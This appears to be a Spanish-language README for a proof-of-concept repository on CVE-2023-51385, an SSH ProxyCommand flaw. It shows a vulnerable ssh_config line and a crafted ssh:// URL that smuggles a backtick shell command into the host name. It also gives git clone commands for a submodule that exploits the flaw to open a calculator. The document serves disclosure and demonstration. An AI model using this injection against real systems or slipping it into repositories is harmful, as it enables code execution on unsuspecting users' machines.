
CVE-2023-51385
RCE mediante ~/.ssh/config inseguro El uso de tokens como %h, %p es bastante popular para utilizar túneles y proxy de conexión mediante SSH ProxyCommand.
Configuración vulnerable host *.example.com ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p Nota: en mi evaluación inicial, tenía la impresión de que usar '%h' (comillas simples) evitaría esto, pero parece que aún es vulnerable con algo como:
ssh://echo helloworld > cve.txt`foo.example.com/bar
Tomado de: https://man.openbsd.org/ssh_config#ProxyCommand
Qué hay en este repositorio Un submódulo que explotaría esta vulnerabilidad para abrir una calculadora en OSX.
Pruébalo usando:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
o
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules